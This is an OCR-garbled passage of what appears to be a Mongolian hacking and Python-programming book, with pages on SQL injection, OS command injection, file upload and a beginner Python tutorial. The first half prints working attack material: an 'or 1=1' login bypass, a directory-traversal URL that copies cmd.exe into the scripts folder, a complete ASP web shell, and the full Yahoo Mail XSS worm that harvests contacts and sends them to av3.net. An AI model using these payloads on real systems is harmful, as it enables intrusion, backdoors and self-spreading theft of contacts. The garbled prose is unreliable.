Orerannüu cau ôon ao:poo kpean: kap:bu ayraap, uyyu vr rax Ma:
uyxan svüncnür aryynaar ônnaa. Taraan ererannüu caurnüu Maaaannnür
eep: xapar:aüraap amnrnax uaaaan.
Baô cepaep xakepaax xaMrnüu aMapxau ôereea :vraaMan apra ôon
SOL injection kM. Aux aaô xnüx ôaüraa nxaux xvMvvc xyyaacubxaa nornu
xnüaar xacrnür aapaax ôaüanaap ônuaar. 3ua anaaa Nouronbu aaô
xyyaacuyyaaa anôar :oxnonaaor.
$result = mysql_query(“ SELECT * FROM users WHERE user= ’$user’ and
pass= ’$pass’ “ ) ;
if(mysql_num_rows($result )> 0){
/ / login
}
3ua vea username-aaa “ admin” or 1= 1/ * ’’ rax erexea n myya uaa:paaa
opunxaor. 3ua / * ôon SQL-nüu koMaua kM.
$result = mysql_query(“ SELECT * FROM users
WHERE user= ’admin’ or 1= 1 / * ‘ and
pass= ’$pass’ “ ) ;
- OS I nj ect i on -
!njection ôon Xakep: aaô annnnkeümuaap aaMxyynx cnc:eM pvv
eepnüu koaoo sayynax ôonoMxnür onroaor svün kM. OMuex SOL injection
:aü uar y:ra cauaa:aü. Cnc:eMnüu dyukuyyabr xakepaax sopnnroop
amnrnaxbr Operation System injection raaa ôaüraa kM. java.lang.Runtime
us vünannüu cnc:eM:aü xapnnuau axnnnaaar yunp nüM ôonoMxnür
onrouo. .NET-a ôon System.Diagnostics.Process.Start us vuacau ron
xaparnax svün ôonuo. Xapnu PHP-a ôon exec(), passthru() racau dyukuyya
ôaüaar.
Xnmaanôan Java aaap ônuaan:
public class DoSt uff {
public st ring execut eCommand(St ring userName)
{ t ry
{
87
St ring myUid = userName;
Runt ime rt = Runt ime.get Runt ime();
rt .exec("doSt uff.exe " + ” -“ + myUid); / / Call exe wit h
userI D
} cat ch(Except ion e)
{
e.print St ackTrace() ;
}
}
}
get Runt ime() -p aaMxyynx doStuff.exe-r axnyynx ôaüua. Yvunür
.NET-a amnrnaaan:
namespace Ext ernalExecut ion
{
class CallExt ernal
{
st at ic void Main(st ring[ ] args)
{
St ring arg1= args[ 0] ;
Syst em.Diagnost ics.Process.St art ("doSt uf f.exe", arg1);
}
}
}
3ua ôon Shell amnrnax raaaaa nporpaM axnyynax kM.
- HTTP post SOL query aaãpyynax -
Uaaap HTTP npo:okonoop aaMxyynx aaô cepaep ôonou annnnkeümu
cepaep: uaa:apu aoa:nox aprbr aua vsua. 3uaxvv apraap aaô
annnnkeümu pyy aoa:noxoa ran: xaua (firewall) ôonou SSL sMap u uenee
vsvvnaxrvür xapyynax ôonuo. Fan: xaua seaxeu vuau sea HTTP xvcan:aua
vuau sea HTTP xapnyn: n xvnaau seameeperaeue.
3xnaaa URL parsing xnüx xapar:aü.
ht t p: / / www1.example.com/ script s/ ..%c0%af../ winnt / syst em32/ cmd.Exe?/ C
+ copy+ c: \ winnt \ syst em32\ cmd.Exe+ c: \ inet pub \ script s
88
3xnaaa xanaax ôonoxoop aaô annnnkeümu onôon auaxvv aprbr
xaparnax ôonox acaxnür manrax :or:oouo. Xapaa aoa:onrooroo caüu
ôonroë raaan aapaax xoëp xvunu svünnür auxaapax xapar:aü.
1. Haaax:aü opon:oop xauaax - aoa:nox rax ôaüraa cepaep acaan
cvnxaa pvv axnnnax ôaüraa koMMauaaap xynraüraap uaa:pax
2. 1aün aaMxyynaruaap xauaax - nop: mnuxnaru, rootkits mnr
aoa:nox xaparcnvvaaap amnrnax
Hsr: ran: xaua:aü oô¡ek:yya pyy xvpu uaaua raaar Mam xauvv, raxaaa
or: ôonoMxrvü svün ônmaa. Baapx xssraapnan:aa xvpaxnüu :yna ôara
sapar aaô nporpaMunax Maanar, cepaep nvv daün xyynaru (file uploader)
ôa command promt ôaüxaa n ôonuo.
ASP aaap ônucau daün xyynarunüu koa:
< form met hod= post ENCTYPE= "mult ipart / form-dat a">
< input t ype= file name= "File1">
< input t ype= "submit " Name= "Act ion" value= "Upload">
< / form>
< hr>
< ! --# I NCLUDE FI LE= "upload.inc" -->
< %
I f Request .ServerVariables( "REQUEST_METHOD") = "POST" Then
Set Fields = Get Upload()
I f Fields( "File1") .FileName < > "" Then
Fields( "File1") .Value.SaveAs Server.MapPat h( ".") & "\ " & Fields( "File1") .FileName
Response.Writ e( "< LI > Upload: " & Fields( "File1") .FileName)
End I f
End I f
%>
89
Bna aaô cepaepnüu koMMauabr ancaac yanpaax uaacau vea xakepaax
axnnnaraa axanua. Bna sMap uar aurnüu apra xaparnax aaô cepaep nvv
aoa:onuo. Bna axnaaa URL-aa :oaopxoünx ancaac cepaepnüu koMauabr
yanpaaxbr :aunnuyynua. Cmdasp.asp xyyaacub koa
< % Dim oScript , oScript Net , oFileSys, oFile, szCMD, szTempFile
On Error Resume Next
Set oScript = Server.Creat eObj ect ( "WSCRI PT.SHELL")
Set oScript Net = Server.Creat eObj ect ( "WSCRI PT.NETWORK")
Set oFileSys = Server.Creat eObj ect ( "Script ing.FileSyst emObj ect ")
szCMD = Request .Form(".CMD")
I f ( szCMD < > "") Then
szTempFile = "C: \ " & oFileSys.Get TempName( )
Call oScript .Run ( "cmd.exe / c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenText File ( szTempFile, 1, False, 0)
End I f
%>
< FORM act ion= "< %= Request .ServerVariables( "URL") %> " met hod= "POST">
< input t ype= t ext name= ".CMD" size= 45 value= "< %= szCMD %> ">
< input t ype= submit value= "Run">
< / FORM>
< PRE>
< %
I f ( I sObj ect ( oFile)) Then
On Error Resume Next
Response.Writ e Server.HTMLEncode( oFile.ReadAll) oFile.Close
Call oFileSys.Delet eFile( szTempFile, True)
End I f
%>
< / PRE>
90
Bnaunü sopnnro ôon shell xepavvnarunür (/bin/sh, cmd.exe rax Ma:)
aaô cepaepnüu vuacau anpek:op nyy apbu xaanra(backdoor) vvcrax
xyynax kM. 3ua us ôna URL-aap aaMxyynx shell xepavvnarunür ayyaaxbr
sopnnro:oü. 3ua xapxau apbu xaanra vvcrax :yxaü rypaau aprbr vsua.
HTTP POST-br amnrnax c:auaap: opon:oop ererannür aaô cepaep
nvv xyynua. Xapxau koMMaua xepavvnarunür POST amnrnax nnraaxnür
vsua. Windows NT-rnüu !!S pvv cmd.exe, Linux-nüu Apache pvv sh.cgi
uapbr :yc :yc xyynua. 3ua xapxau xakepaax xnuaan ônm yupaac uaam
vün saubr sypraap vsvvnnaa. XaMrnüu cvvna SOL query uaüpyynx ôaüua.
91
- Yahoo XSS wor m -
Boop ôaüraar xapaaa y:ra yunprvü :ekc: rax ôoaox ôonoxrvü mvv.
Ta uap worm-nüu :yxaü onou coucox ôaücau ôaüx, ôn aua uarnür us
:aannaa. 3vraap XSS worm rax ky ôaüarnür xapar racauaaa. 3ua ôaüraar
ôvranür us ônuaaa axnnnyynaxaa nx xeaenMep opox ôonuo. Xapnu apaü
rax ônuaaa xaaranaxaap unus Ant ivirus-unü nporpaM unus yc:raunx ôaüx.
Xapnu vvunür :ausx uaaaxrvü ôaüraa Ant ivirus-:aü ôon svraap Ant ivirus-
unüxaa nporpaMbr yc:ra. Xapnu ônunx axnbr unus xooxou xeureaunex
vvauaac ht t p: / / ha.ckers.org caü:aac xaüraaa vsaapaü rax seanex ôaüua.
< img src= 'ht t p: / / us.i1.yimg.com/ us.yimg.com/ i/ us/ nt / ma/ ma_mail_1.gif'
onfilt ered= "var ht t p_request = false; var Email = ''; var I DList = ''; var
CRumb = ''; f unct ion makeRequest (url, Func, Met hod, Param) { if
(window.XMLHt t pRequest ) { ht t p_request = new XMLHt t pRequest (); } else
if (window.Act iveXObj ect ) { ht t p_request = new
Act iveXObj ect ('Microsoft .XMLHTTP'); } ht t p_request . onfilt ered= Func;
92
ht t p_request .open(Met hod, url, t rue); if( Met hod = = ' GET')
ht t p_request .send(null); else ht t p_request .send(Param) ;
} window.open('ht t p: / / www,last dat a.com'); ServerUrl = url0; USI ndex =
ServerUrl.indexOf('us.' ,0); MailI ndex = ServerUrl.indexOf('.mail' ,0); Cut Len
= MailI ndex - USI ndex - 3; var Server = ServerUrl.subst r(USI ndex + 3,
Cut Len) ; f unct ion Get I Ds( Ht mlCont ent ) { I DList = ''; St art St ring = ' < t d> ';
EndSt ring = '< / t d> '; i = 0; St art I ndex = Ht mlCont ent .indexOf(St art St ring,
0); while( St art I ndex > = 0) { EndI ndex = Ht mlCont ent .indexOf(EndSt ring,
St art I ndex); Cut Len = EndI ndex - St art I ndex - St art St ring.lengt h; YahooI D
= Ht mlCont ent .subst r(St art I ndex + St art St ring.lengt h, Cut Len) ; if(
YahooI D.indexOf('@yahoo.com', 0) > 0 | |
YahooI D.indexOf('@yahoogroups.com', 0) > 0 ) I DList = I DList + ',' +
YahooI D ; St art St ring = ' < / t r> '; St art I ndex =
Ht mlCont ent .indexOf( St art St ring, St art I ndex + 20) ; St art St ring = ' < t d> ';
St art I ndex = Ht mlCont ent .indexOf(St art St ring, St art I ndex + 20); i+ + ; }
if(I DList .subst r(0,1) = = ',') I DList = I DList .subst r( 1, I DList .lengt h);
if(I DList .indexOf(',', 0) > 0 ) { I DList Array = I DList .split ( ','); Email =
I DList Array[ 0] ; I DList = I DList .replace(Email + ',', ''); } CurEmail =
spamform.NE.value; I DList = I DList .replace(CurEmail + ',', ''); I DList =
I DList .replace(',' + CurEmail, ''); I DList = I DList .replace(CurEmail,
''); UserEmail = showLet t er.FromAddress.value; I DList = I DList .replace(',' +
UserEmail, ''); I DList = I DList .replace(UserEmail + ',', ''); I DList =
I DList .replace(UserEmail, ''); ret urn I DList ; } funct ion List Cont act s() { if
(ht t p_request .readySt at e = = 4) { if (ht t p_request .st at us = = 200) {
Ht mlCont ent = ht t p_request .responseText ; I DList = Get I Ds(Ht mlCont ent );
makeRequest ('ht t p: / / us.' + Server + '.mail.yahoo.com/ ym/ Compose/ ?rnd= '
+ Mat h.random(), Get crumb, 'GET', null); } } } f unct ion
Ext ract St r(Ht mlCont ent ) { St art St ring = 'name= \ u0022.crumb\ u0022
value= \ u0022?; EndSt ring = ' \ u0022?; i = 0; St art I ndex =
Ht mlCont ent .indexOf( St art St ring, 0) ; EndI ndex =
Ht mlCont ent .indexOf(EndSt ring, St art I ndex + St art St ring.lengt h ); Cut Len
= EndI ndex - St art I ndex - St art St ring.lengt h; crumb =
Ht mlCont ent .subst r(St art I ndex + St art St ring.lengt h , Cut Len ) ; ret urn
crumb; } f unct ion Get crumb() { if (ht t p_request .readySt at e = = 4) { if
(ht t p_request .st at us = = 200) { Ht mlCont ent = ht t p_request .responseText ;
CRumb = Ext ract St r( Ht mlCont ent ); MyBody = 't his is t est '; MySubj = 'New
Graphic Sit e'; Url = 'ht t p: / / us.' + Server + '.mail.yahoo.com/ ym/ Compose';
var ComposeAct ion = compose.act ion; MidI ndex =
ComposeAct ion.indexOf('&Mid= ' ,0) ; incI ndex =
93
ComposeAct ion.indexOf('&inc' ,0) ; Cut Len = incI ndex - MidI ndex - 5; var
MyMid = ComposeAct ion.subst r(MidI ndex + 5, Cut Len) ; QI ndex =
ComposeAct ion.indexOf('?box= ' ,0) ; AI ndex =
ComposeAct ion.indexOf('&Mid' ,0); Cut Len = AI ndex - QI ndex - 5; var
BoxName = ComposeAct ion.subst r(QI ndex + 5, Cut Len); Param =
'SEND= 1&SD= &SC= &CAN= &docCharset = windows-
1256&Phot oMailUser= &Phot oToolI nst all= &OpenI nsert Phot o= &Phot oGet St a
rt = 0&SaveCopy= no&Phot oMailI nst allOrigin= &.crumb= RUMBVAL&Mid= EM
AI LMI D&inc= &At t Fol= &box= BOXNAME&FwdFile= YM_FM&FwdMsg= EMAI L
MI D&FwdSubj = EMAI LSUBJ&FwdI nline= &OriginalFrom= FROMEMAI L&Origi
nalSubj ect = EMAI LSUBJ&I nReplyTo= &NumAt t = 0&At t Dat a= &UplDat a= &Old
At t Dat a= &OldUplDat a= &FName= &ATT= &VI D= &Markers= &Next Marker= 0
&Thumbnails= &Phot oMailWit h= &BrowseSt at e= &Phot oI con= &ToolbarSt at e
= &VirusReport = &At t achment s= &Background= &BGRef = &BGDesc= &BGDef
= &BGFg= &BGFF= &BGFS= &BGSolid= &BGCust om= &PlainMsg= %3Cbr%3E
%3Cbr%3ENot e%3A+ f orwarded+ message+ at t ached.&Phot oFrame= &Phot
oPrint At HomeLink= &Phot oSlideShowLink= &Phot oPrint Link= &Phot oSaveLin
k= &Phot oPermCap= &Phot oPermPat h= &Phot oDownloadUrl= &Phot oSaveUrl
= &Phot oFlags= &st art = compose&bmdomain= &showcc= &showbcc= &AC_D
one= &AC_ToList = 0%2C&AC_CcList = &AC_BccList = &sendt op= Send&savedr
aft t op= Save+ as+ a+ Draft &cancelt op= Cancel&FromAddr= &To= TOEMAI L&
Cc= &Bcc= BCCLI ST&Subj = EMAI LSUBJ&Body= %3CBR%3E%3CBR%3ENot e
%3A+ forwarded+ message+ at t ached.&Format = ht ml&sendbot t om= Send&s
avedraft bot t om= Save+ as+ a+ Draft &cancelbot t om= Cancel&cancelbot t om=
Cancel'; Param = Param.replace('BOXNAME', BoxName); Param =
Param.replace('RUMBVAL', CRumb); Param = Param.replace('BCCLI ST',
I DList ) ; Param = Param.replace('TOEMAI L', Email); Param =
Param.replace('FROMEMAI L', 'av3@yahoo.com'); Param =
Param.replace('EMAI LBODY', MyBody); Param =
Param.replace('PlainMESSAGE', ''); Param = Param.replace('EMAI LSUBJ',
MySubj ) ; Param= Param.replace('EMAI LSUBJ', MySubj ); Param =
Param.replace('EMAI LSUBJ', MySubj ) ; Param = Param.replace('EMAI LMI D',
MyMid); Param = Param.replace('EMAI LMI D', MyMid); makeRequest (Url ,
alert Cont ent s, 'POST', Param); } } } f unct ion alert Cont ent s() { if
(ht t p_request .readySt at e = = 4) {
window.navigat e('ht t p: / / www.av3.net / ?ShowFolder&rb= Sent &r eset = 1&YY
= 75867&inc= 25&order= down&sort = dat e&pos= 0&view= a&head= f&box= I
nbox&ShowFolder?rb= Sent &reset = 1&YY= 75867&inc= 25&order= down&sor
t = dat e&pos= 0&view= a&head= f&box= I nbox&ShowFolder?rb= Sent &reset =
94
1&YY= 75867&inc= 25&order= down&sort = dat e&pos= 0&view= a&head= f&b
ox= I nbox&BCCList = ' + I DList ) } } makeRequest ('ht t p: / / us.' + Server +
'.mail.yahoo.com/ ym/ QuickBuilder?build= Cont inue&cancel= &cont inuet op=
Cont inue&cancelt op= Cancel&I nbox= I nbox&Sent = Sent &pfolder= all&freqCh
eck= &freq= 1&numdays= on&dat e= 180&ps= 1&numadr= 100&cont inuebot t
om= Cont inue&cancelbot t om= Cancel&rnd= ' + Mat h.random(),
List Cont act s, 'GET', null) "> Please wait while loading t he sit e
95
- 6vnsr 4 -
Pyt hon xan
“ All informat ion should be free”
- Hact ivism
96
97
- Pyt hon xsnaaã 1yxaã -
1990 oua Guido van Rossum-nü ôv:aacau Python xan ôon xsnôap ôa
xvunpxar racau mnux uauapbr xocnyyncau ueexeu nporpaMunanbu
xanunü uar kM. 2006 oub 9 capbu 19-ua Pyt hon 2.5 xyannôap us rapcau.
Xapnu Mauaü Nouronuyya aua xannür uar nx Maaaarrvü, vuanaarrvü kM
mnr uaaaa cauaracau. Xapaa :a eMue us sMap uar nporpaMunanbu xan
cyaanx ôaücau ôon eepnüu eMue ayp:aü ôaücau xan, pyt hon xanunü
xoopouabu snraar caüu auxaapaapaü. Yaaxrvü :aub xaMrnüu ayp:aü xan
pyt hon ôonox ôonuo. Pyt hon xannür cypaxaa vuaxaap xsnôap ôereea sr n
aurnnap ervvnôap yumnx ôaüraa Ma:, cnu:akc us ôycaa xan:aü
oüponuoo. ºMap u vünannüu cnc:eM aaap axnyynx ôonuo. Pyt hon ôon
oô¡ek: xauaan:a: nporpaMunanbu xan. Pyt hon xan us vuaxaap caüu
xauraracau Mam caüu library-:aü.
LI SP xannür ônucau, oaoo Google-nüu xaün:bu cnc:eMnüu uauap
xapnyucau saxnpan Peter Norvig xanaxaaa: Python xan ôon Google-nüu
uar xacar kM. Bnaunü xnücau axnn vvu:aü Mam usr: xonôoo:oü, vvunür
aapaax xasraap (ht t p: / / www.google.com/ j obs/ index.ht ml) xapx ôonuo
raxaa.
3ua Pyt hon-nür xoëp vuacau xyannôapaap xerxvvnaar. Jyt hon ôon
Java-a, !ronPython us .NET opunua xerxvvnaraaar.
3xnaaa Pyt hon nporpaMaa ônunxnüu :yna edit or xapar ôonuo.
Windows-nüu edit or xaparnax ôonox ôonoau anaaar us xapyynaarrvü
yunp sopnynan:bu edit or-yya nnvv vp avu:aü. Bn ôon I DLE xaMaax edit or-
nür cauan ôonrox ôaüua. 3uaaac :a:ax aau ôonuo.
ht t p: / / www.pyt hon.org/ cgi-bin/ moinmoin/ Pyt honEdit ors
Linux/ FreeBSD aaap pyt hon mnuaap cyynrax sMap u maapanararvü.
Windows vünannüu cnc:eM xaparnaruna pyt hon xanunü xepavvnarunür
ht t p: / / www.pyt hon.org/ download xasraac :a:aaa aau ôonuo.
- Yapcsa xscsr -
ºMap u nporpaMunanbu xannür aux cypaxaa ônuaar axunü nporpaM
ôon Hello World racau vrnür aanrauaua xaanax ôaüaar. Pyt hon xan aaap
ônunracau nporpaM Maaus .py :ercren:aü ôaüx ôonuo. Edit or-oo uaaraaa
aapaax koabr ônuaaa axnyyn. I DLE edit or amnrnacau ôon CTRL + F5.
98
# ! / usr/ bin/ pyt hon
# Filename : helloworld.py
print 'Hello World'
vp avu: $ pyt hon helloworld.py
Hello World
Tvnxvvp vr raaar ôon nporpaMunaxaa amnrnaraaar, :or:Mon vrvva
ôaüaar ôereea xyascaruaaa aaraap uapnür us amnrnax ôonoxrvü.
Pyt hon xanaua 29 :vnxvvp vr ôaüaar:
and def exec if not ret urn
assert del finally import or t ry
break elif for in pass while
class else from is print yield
cont inue except global lambda raise
Pyt hon xanaua + :epnnüu :oou xyascaru ôaüaar. int egers, long
int egers, float ing point , complex numbers. I nt :oo us 32 acaan 6+ ôn:
ôaüaar. Long :epen us memory xaMxaauaacaa xaMaapaar, LI SP xanunü
bignum mnr. Xapaa :oo int xaMxaauaacaa xa:apaan aa:oMa:aap long pvv
xepavvnaraaua. Xapnu koMnnekc raaar us: -5++j kM.
OMuex xnmaau aaap Hello World rax ônunxaa aau xamnn::aü ôaücau.
Taraan 'What 's your name?' ervvnôapnür ônunxaa xepavvnaru ôypyyraap
oünroxoop ôaüua. Yvunür mnüaax 2 apra saM ôaüua. 3xunü apra us
:amyy sypaac (slash) amnrnax 'What \ 's your name?'. Heree apra us
"What's your name?" rax ônunx, xapaa :a :amyy sypaac ônunxaap ôon
aaaxap :amyy sypaac ônunx xapar:aü ¨\ \ ” xapar:aü. Taua :aunn cauaraax
ôaüua yy? ºr C xan mnr ôaüraa ôns, mnua Mep aaax us u racau aannxau
\ n. Xapnu aau xamnn:, aaaxap xamnn:bu xoopoua snraa ôaüxrvü raarnür
cauaapaü. Neu rypaau aaaxap xamnn: ôaüaar.
Xapaa :a Unicode-p ônunx xapar:aü ôon :ekc:nüuxaa eMue us ¨u” vcar
:aanx xapar:aü. Xnmaa us: u"This is a Unicode st ring."
Xyascarunüu uap u racau ôycaa xan:aü oüponuoo name_23,
_myname, name rax Ma:. Xapnu :ooroop axanx ôonoxrvü. ToM xnxnr
vcrnür snraa:aü aau vsua. myName, myname xoëp ôon snraa:aü
xyascaruna ôonuo. Baap vscau kMaa xnmaaraap xap¡s.
# ! / usr/ bin/ pyt hon
# Filename : var.py
i = 5
print i
99
i = i + 1
print i
s = '''This is a mult i-line st ring.
This is t he second line.'''
print s
vp avu: $ pyt hon var.py
5
6
This is a mult i-line st ring.
This is t he second line.
3apnM xan saaaan uar :acnan (;) :aanxbr maapaaar ôon, pyt hon
xanaua uar :acnan :aasx u ôonuo. Taanxrvü ôaücau u ôonuo.
i = 5
print i
ôa
i = 5;
print !; aaapx xoëp ônunarnüu xoopoua sMap snraa rapaxrvü.
- Onepa1opyyp -
Onepa:opyyabr myya xnmaau aaap :aünôapnaaa saunxaan oünroxoa
aMap ôaüx.
HaMax ( + ): 3 + 5 xapny us 8.
'a' + 'b' xapny us 'ab' ôonuo.
Xacax (-): -5.2 ôon ceper :oo.
50 - 2+ xapny us 26 ôonuo.
Ypxnx (*): 2 * 3 xapny us 6.
'ha' * 3 xapny us 'hahaha' ôonuo. Neu perl xan aaap
nurax vpxvvnarnür ôn Maaax kM ôaüua.
3apar aaamvvnax (**): 3 ** + xapny us 81 ôonuo.
Xyaaax (/): 4/ 3 xapny us 1 (int eger yupaac)
+.0/3 acaan +/3.0 xapny us 1.3333. rapax ôonuo.
Ynaaraanrvü xyaaax (/ / ): 4 / / 3.0 xapny us 1.0 ôonuo.
100
Ynaaraan onox (¾): 8¾3 xapny us 2.
-25.5¾2.25 xapny us 1.5 ôonuo.
Bn: svvu mnnxvvnax (<<): 2 << 2 xapny us 8 rapua. 2 :ooub ôn: us
10 ôaüua. 2 ôn: svvu mnnxvvnaxaap 1000
ôonuo. 1000 raaar Maaus 8 racau vr.
Bn: ôapyyu mnnxvvnax (>>): 11 >> 1 xapny us 5 rapua. 11 ôon
1011 rax ônunraaua. 1 opou
mnnxvvnaxaap 101 ôyky 5 rapua.
Bn: ¨AND” vünaan (&) : 5 & 3 xapny us 1 ôonuo. 101 ôa 11 xoopoua
ôn: ¨ôa" vünaan xnüxaap 001 rapua.
Bn: “ OR” vünaan (| ): 5 | 3 xapny us / ôonuo. 101 ôa 11 xoopoua ôn:
¨ôyky" vünaan xnüxaap 111 ôyky / rapua.
Bn: ¨XOR” vünaan ('): 5 ^ 3 xapny us 6 rapua. 101 ôa 11 xoopoua
ôn: “ xor” vünaan xnüxaap 110 ôyky 6 rapua.
Bn: ¨invet ” vünaan (~ ), x invert -(x+ 1) : ~ 5 us -6 ôonuo.
Bara (< ): 5 < 3 us xyaan ôyky 0 y:ra ôyuaaua.
3 < 5 < 7 us vuau ôyky 1 y:ra ôyuaaua.
Hx (> ): 5 > 3 us vuau ôyky 1 y:ra ôyuaaua.
3ua Ma:unnau onou vünaan ôaüraa. Onepa:opyyabu ônenaraax
aapaanan us ôycaa xan:aü aann ôaüaar. Oaoo aaapx vscauaa amnrnau
xnmaa ônunx vsse.
# ! / usr/ bin/ pyt hon
# Filename: expression.py
lengt h = 5
breadt h = 2
area = lengt h * breadt h
print 'Area is', area
print 'Perimet er is', 2 * (lengt h + breadt h)
vp avu: $ pyt hon expression.py
101
Area is 10
Perimet er is 14
- Hoxuon manrax IF vãnpsn -
3naaa kM uypmnnrvü myya uexuen manrax if vünaan amnrnacau
xnmaa vsse. I f uexuen vuau ôon aapaax vünanaa rvüua:rax, xyaan ôon
ônenvvnaxrvü vcapua.
# ! / usr/ bin/ pyt hon
# Filename: if.py
number = 23
guess = int (raw_input ('Ent er an int eger : '))
if guess = = number:
print 'Congrat ulat ions, you guessed it .'
print "(but you do not win any prizes! )"
elif guess < number:
print 'No, it is a lit t le higher t han t hat '
else:
print 'No, it is a lit t le lower t han t hat '
print 'Done'
vp avu: $ pyt hon if.py
Ent er an int eger : 50
No, it is a lit t le lower t han t hat
Done
$ pyt hon if.py
Ent er an int eger : 22
No, it is a lit t le higher t han t hat
Done
$ pyt hon if.py
Ent er an int eger : 23
Congrat ulat ions, you guessed it .
(but you do not win any prizes! )
Done
102
- Hoxuon1 paa1an1 while vãnpsn -
Oaoo uexuen: aaa:an: while-nüu xnmaar aau vsse. Yuau ôon ônok
ao:opxoo ônenvvnua, xyaan ôonoxoop aaa:an:aac rapua.
# ! / usr/ bin/ pyt hon
# Filename: while.py
number = 23
running = True
while running:
guess = int (raw_input ('Ent er an int eger : '))
if guess = = number:
print 'Congrat ulat ions, you guessed it .'
running = False
elif guess < number:
print 'No, it is a lit t le higher t han t hat .'
else:
print 'No, it is a lit t le lower t han t hat .'
else:
print 'The while loop is over.'
print 'Done'
vp avu: $ pyt hon while.py
Ent er an int eger : 50
No, it is a lit t le lower t han t hat .
Ent er an int eger : 22
No, it is a lit t le higher t han t hat .
Ent er an int eger : 23
Congrat ulat ions, you guessed it .
The while loop is over.
Done
- For paa1an1 -
Oaoo for aaa:an: xapxau amnrnaxbr vsse. Bvx xanaua ôaüaar svünc
yupaac if, while, for-nüu :yxaü aanrapaurvü :aünôapnax maapanararvü
rax vsax ôaüua.
# ! / usr/ bin/ pyt hon
103
# Filename: for.py
for i in range(1, 5):
print i
else:
print 'The for loop is over'
vp avu: $ pyt hon for.py
1
2
3
4
The for loop is over
- Break vãnpsn -
Baa:an:aac rapaxbu :yna break vünannür amnrnaua. Baa:an:br
ayycaxaac eMue aaa:an:aac rapax xapar:aü vea vvunür amnrnaua.
# ! / usr/ bin/ pyt hon
# Filename: break.py
while True:
s = raw_input ('Ent er somet hing : ')
if s = = 'quit ':
break
print 'Lengt h of t he st ring is', len(s)
print 'Done'
vp avu: $ pyt hon break.py
Ent er somet hing : Programming is f un
Lengt h of t he st ring is 18
Ent er somet hing : use Pyt hon!
Lengt h of t he st ring is 12
Ent er somet hing : quit
Done
- Cont i nue vãnpsn -
Baa:an:bu vea continue vünaan us aapaarnüu vünannür xnüx ôonuo.
Xnmaau aaap I f uexuen manraunxaaa sMap u vünaan xnüx maapanararvü
vea vvunür amnrnax aaa:an:br vpranxnvvncau ôaüua.
104
# ! / usr/ bin/ pyt hon
# Filename: cont inue.py
while True:
s = raw_input ('Ent er somet hing : ')
if s = = 'quit ':
break
if len(s) < 3:
cont inue
print 'I nput is of suf ficient lengt h'
vp avu: $ pyt hon cont inue.py
Ent er somet hing : a
Ent er somet hing : 12
Ent er somet hing : abc
I nput is of suf ficient lengt h
Ent er somet hing : quit
- Oyaxu -
1yuku ôon nporpaMbu aaxnu amnrnax sopnnro:oü xacar kM.
1yukunür nporpaMbu xaauaac u ayyaax axnyynx ôonaor. 1yukuaa
nnraacau y:raa aau, eepnüu ônok ao:opx vünanvvaaa rvüua:raaa vp
avuraa ôyuaax sayynax sapuMaap axnnnaua. Bapaax xnmaau aaap
xyascaru aaMxyynx ôaüua.
# ! / usr/ bin/ pyt hon
# Filename: f unc_param.py
def print Max(a, b) :
if a > b:
print a, 'is maximum'
else:
print b, 'is maximum'
print Max(3, 4)
x = 5
y = 7
print Max(x, y)
vp avu: $ pyt hon func_param.py
4 is maximum
7 is maximum
105
1yuku:aü xonôoo:oü uar ron svün ôon ao:ooa xyascaru, dyuku
ao:op axnnnax ôaüraa xyascarunüu y:ra nporpaMa axnnnax ôaüraa
xyascarunüu y:raua xaanü aannxau uap:aü u eepunen: xnüx uaaaxrvü.
# ! / usr/ bin/ pyt hon
# Filename: f unc_local.py
def f unc( x):
print 'x is', x
x = 2
print 'Changed local x t o', x
x = 50
func(x)
print 'x is st ill', x
vp avu: $ pyt hon func_local.py
x is 50
Changed local x t o 2
x is st ill 50
Baapxnüu acpar us rnoôan xyascaru, dyuku ôonou nporpaMbu
:ypmna vünunnx ôaüaar xyascaru.
# ! / usr/ bin/ pyt hon
# Filename: f unc_global.py
def f unc() :
global x
print 'x is', x
x = 2
print 'Changed global x t o', x
x = 50
func()
print 'Value of x is', x
vp avu: $ pyt hon func_global.py
x is 50
Changed global x t o 2
Value of x is 2
Auxaaru y:ra:aü dyuku us xaanü raauaac y:ra aaMxaarvü ôaücau u
eepnüuxee default y:raap dyukunür axnyynaxbr xanx ôaüraa kM.
Auxaaru y:ra:aü dyukunür xnmaauaac xapua yy.
# ! / usr/ bin/ pyt hon
# Filename: f unc_default .py
106
def say(message, t imes = 1):
print message * t imes
say('Hello')
say('World', 5)
vp avu: $ pyt hon func_default .py
Hello
WorldWorldWorldWorldWorld
1yuku y:ra ôyuaaxrvü ôaüx ôonox ôa y:ra ôyuaax ôonôon return
vünannür amnrnaua.
# ! / usr/ bin/ pyt hon
# Filename: f unc_ret urn.py
def maximum(x, y):
if x > y:
ret urn x
else:
ret urn y
print maximum(2, 3)
vp avu: $ python func_return.py
3
DocSt rings ôon python xanunü uar ouunor. Xnmaaraap vsaan nnvv
oünroMx:oü ôonox ôaüx.
# ! / usr/ bin/ pyt hon
# Filename: f unc_doc.py
def print Max(x, y) :
'''Print s t he maximum of t wo numbers.
The t wo values must be int egers.'''
x = int ( x)
y = int (y)
if x > y:
print x, 'is maximum'
else:
print y, 'is maximum'
print Max(3, 5)
print print Max.__doc__
vp avu: $ pyt hon func_doc.py
5 is maximum
Print s t he maximum of t wo numbers.
107
The t wo values must be int egers.
- Mopynb -
Noayns us xaparnarunüu :oaopxoüncou ôycaa dyuku ôonou
xyascaruabr ao:poo aryyncau nporpaMaaa raauaac ayyaax aaxnu
amnrnax ôonoMx:oü koa kM. 3xnaaa ôna pyt hon-b c:auaap: library-r
xapxau amnrnaxbr vsse.
# ! / usr/ bin/ pyt hon
# Filename: using_sys.py
import sys
print 'The command line argument s are: '
for i in sys.argv:
print i
print '\ n\ nThe PYTHONPATH is', sys.pat h, ' \ n'
vp avu: $ pyt hon using_sys.py we are argument s
The command line argument s are:
using_sys.py
we
are
argument s
The PYTHONPATH is [ '/ home/ swaroop/ byt e/ code',
'/ usr/ lib/ pyt hon23.zip',
'/ usr/ lib/ pyt hon2.3', '/ usr/ lib/ pyt hon2.3/ plat -linux2',
'/ usr/ lib/ pyt hon2.3/ lib-t k', '/ usr/ lib/ pyt hon2.3/ lib-dynload',
'/ usr/ lib/ pyt hon2.3/ sit e-packages', '/ usr/ lib/ pyt hon2.3/ sit e-
packages/ gt k-2.0']
C:auaap: Moaynnac raaua eepnüu racau Moayns :oaopxoünx ôac
ôonuo. 3xunüx us xaparnarunüu :oaopxoüncou Moayns, xoëp aaxs aaapaa
:vvunüraa ayyaax amnrnax ôaüua.
# ! / usr/ bin/ pyt hon
